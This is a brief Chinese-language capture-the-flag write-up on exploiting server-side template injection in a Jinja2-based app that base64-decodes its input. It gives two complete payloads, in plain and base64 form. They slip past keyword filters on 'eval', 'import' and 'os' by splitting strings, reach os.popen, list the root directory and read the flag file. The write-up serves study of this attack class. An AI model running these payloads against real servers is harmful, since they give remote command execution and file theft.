输入e3sxKzF9fQ==({{1+1}})进行解密,结果为2,说明可以解析,存在模板注入。
经测试,过滤了flag(ZmxhZyA=),import,os,eval等关键词。
学到了,利用拼接找目录:
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eva'+'l' in b.keys() %} {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} #eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX0NCnslIGlmIGMuX19uYW1lX18gPT0gJ2NhdGNoX3dhcm5pbmdzJyAlfQ0KICB7JSBmb3IgYiBpbiBjLl9faW5pdF9fLl9fZ2xvYmFsc19fLnZhbHVlcygpICV9DQogIHslIGlmIGIuX19jbGFzc19fID09IHt9Ll9fY2xhc3NfXyAlfQ0KICAgIHslIGlmICdldmEnKydsJyBpbiBiLmtleXMoKSAlfQ0KICAgICAge3sgYlsnZXZhJysnbCddKCdfX2ltcG9yJysndF9fJysnKCJvJysncyIpJysnLnBvcGUnKyduJysnKCJscyAvIikucmVhZCgpJykgfX0NCiAgICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRmb3IgJX0NCnslIGVuZGlmICV9DQp7JSBlbmRmb3IgJX0=
可以注意到存在this_is_the_flag.txt,对其也要进行拼接
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eva'+'l' in b.keys() %} {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX0NCnslIGlmIGMuX19uYW1lX18gPT0gJ2NhdGNoX3dhcm5pbmdzJyAlfQ0KICB7JSBmb3IgYiBpbiBjLl9faW5pdF9fLl9fZ2xvYmFsc19fLnZhbHVlcygpICV9DQogIHslIGlmIGIuX19jbGFzc19fID09IHt9Ll9fY2xhc3NfXyAlfQ0KICAgIHslIGlmICdldmEnKydsJyBpbiBiLmtleXMoKSAlfQ0KICAgICAge3sgYlsnZXZhJysnbCddKCdfX2ltcG9yJysndF9fJysnKCJvJysncyIpJysnLnBvcGUnKyduJysnKCJjYXQgL3RoaXNfaXNfdGhlX2ZsIisiYWcudHh0IikucmVhZCgpJykgfX0NCiAgICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRpZiAlfQ0KICB7JSBlbmRmb3IgJX0NCnslIGVuZGlmICV9DQp7JSBlbmRmb3IgJX0=